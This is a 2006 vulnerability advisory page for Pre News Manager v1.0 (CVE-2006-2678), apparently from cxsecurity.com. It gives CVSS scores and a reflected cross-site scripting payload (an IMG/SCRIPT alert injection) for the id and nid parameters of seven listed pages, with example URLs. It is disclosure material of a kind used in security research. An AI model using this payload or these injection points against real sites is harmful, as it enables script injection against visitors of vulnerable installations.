Bug: Pre News Manager v1.0 ( Ascii Version )

Search:
WLB2

Pre News Manager v1.0

Published
Credit
Risk
2006.06.01
luny youfucktard com
Low
CWE
CVE
Local
Remote
N/A
CVE-2006-2678
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5.8/10
4.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
None

Pre News Manager v1.0

Homepage:

http://www.preprojects.com/news.asp

Description:

Effected files:

index.php

news_detail.php

email_story.php

thankyou.php

printable_view.php

tella_friend.php

send_comments.php

Exploits & Vulns:

XSS Vulnerabilities:

By inserting <IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>"> onto the id
and nid variables we are able to create a

XSS attack.

http://www.example.com/news%20manager/index.php?id=[XSS]

http://www.example.com/news%20manager/news_detail.php?nid=[XSS]

http://www.example.com/news%20manager/email_story.php?nid=[XSS]

http://www.example.com/news%20manager/thankyou.php?nid=[XSS]

http://www.example.com/news%20manager/printable_view.php?nid=[XSS]

http://www.example.com/news%20manager/tella_friend.php?nid=[XSS]

http://www.example.com/news%20manager/send_comments.php?nid=[XSS]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version